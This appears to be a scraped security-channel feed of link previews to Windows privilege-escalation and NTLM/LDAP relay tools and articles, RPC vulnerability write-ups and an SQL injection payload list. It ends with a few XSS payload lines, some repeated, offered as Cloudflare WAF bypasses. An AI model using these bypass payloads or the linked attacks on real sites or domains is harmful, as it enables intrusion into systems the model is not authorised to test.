GitHub - Dec0ne/KrbRelayUp: KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).
https://github.com/Dec0ne/KrbRelayUp
https://github.com/Dec0ne/KrbRelayUp
GitHub
GitHub - Dec0ne/KrbRelayUp: KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP…
KrbRelayUp - a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings). - Dec0ne/KrbRelayUp
We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere – SecureAuth
https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/?utm_source=Twitter&utm_medium=Unpaid&utm_campaign=blog-weLoveRelayingCredentials
https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/?utm_source=Twitter&utm_medium=Unpaid&utm_campaign=blog-weLoveRelayingCredentials
SecureAuth
We Love Relaying Credentials: A Technical Guide to Relaying Credentials Everywhere
NTLM relay is a well-known technique that has been with us for many years and never seems to go away.
👍1
Akamai Blog | Critical Remote Code Execution Vulnerabilities in Windows RPC Runtime
https://www.akamai.com/blog/security/critical-remote-code-execution-vulnerabilities-windows-rpc-runtime
https://www.akamai.com/blog/security/critical-remote-code-execution-vulnerabilities-windows-rpc-runtime
Akamai
Remote Code Execution Vulnerabilities in RPC | Akamai Blog | Akamai
Microsoft’s April 2022 Patch Tuesday introduced patches to more than a hundred new vulnerabilities in various components. Three critical vulnerabilities were found and patched in Windows RPC (Remote Procedure Call) runtime:
CVE-2022-24492 and CVE-2022-24528…
CVE-2022-24492 and CVE-2022-24528…
How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks - Praetorian
https://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/
https://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/
Praetorian
How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks
Overview This article describes methods by which an attacker can induce a victim user into authenticating using the NT Lan Manager (NTLM) Authentication Protocol to an attacker-controlled “Intranet” site, even in instances where that site points to an external…
GitHub - payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload List
https://github.com/payloadbox/sql-injection-payload-list
https://github.com/payloadbox/sql-injection-payload-list
Some Cloudflare's latest XSS Bypass:
XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS
XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello>
XSS"><input %00 onControl hello oninput=confirm(domain) x>
XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS
XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello>
XSS"><input %00 onControl hello oninput=confirm(domain) x>